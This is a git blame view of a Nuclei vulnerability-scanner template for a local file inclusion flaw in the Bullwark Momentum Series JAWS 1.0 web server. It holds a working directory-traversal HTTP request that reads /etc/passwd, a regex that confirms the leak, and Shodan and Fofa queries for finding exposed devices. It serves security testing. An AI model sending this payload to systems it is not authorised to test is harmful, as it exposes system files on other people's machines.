daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/other/bullwark-momentum-lfi.yaml

41 lines
1.2 KiB
YAML
Raw Normal View History

Normalized id fields to match schema regex
2020-09-15 19:25:55 +00:00
id: bullwark-momentum-lfi
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
info:
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements
2022-07-26 13:45:11 +00:00
name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
author: pikpikcu
severity: high
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements
2022-07-26 13:45:11 +00:00
description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion.
Changes fixes/around dynamic attributes ("additional-fields") Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-19 13:17:27 +00:00
reference:
- https://www.exploit-db.com/exploits/47773
- http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements
2022-07-26 13:45:11 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
Metadata attribute update
2021-09-16 15:54:33 +00:00
metadata:
Added max request counter of each template
2023-04-28 08:11:21 +00:00
max-request: 1
Update shodan/fofa links to query
2022-07-04 08:46:15 +00:00
shodan-query: Bullwark
fofa-query: "Bullwark"
templateman update
2023-10-14 11:27:55 +00:00
version: Bullwark Momentum Series Web Server JAWS/1.0
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot:
2022-08-27 04:41:18 +00:00
tags: lfi,edb,bullwark
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
- raw:
Update bullwark-momentum-series-directory-traversal.yaml
2020-09-06 20:46:06 +00:00
- |
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{Hostname}}
Update bullwark-momentum-series-directory-traversal.yaml
2020-09-06 20:46:06 +00:00
matchers-condition: and
Create bullwark-momentum-series-directory-traversal.yaml
2020-09-05 14:58:51 +00:00
matchers:
- type: status
status:
- 200
Update bullwark-momentum-series-directory-traversal.yaml
2020-09-06 20:46:06 +00:00
matcher update
2021-09-13 09:58:35 +00:00
- type: regex
regex:
Updated "/etc/passwd" regex to avoid possible false positive results.
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot:
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100b8f3c45d78ecbd39b0a39b09e78b05c1aef4590b14426e666085bc1b9e26dc94022100b56824bf5fd76edad903df9b50bb22d849db2ebe20fd3af7d323d2065ea453de:922c64590222798bb761d5b6d8e72950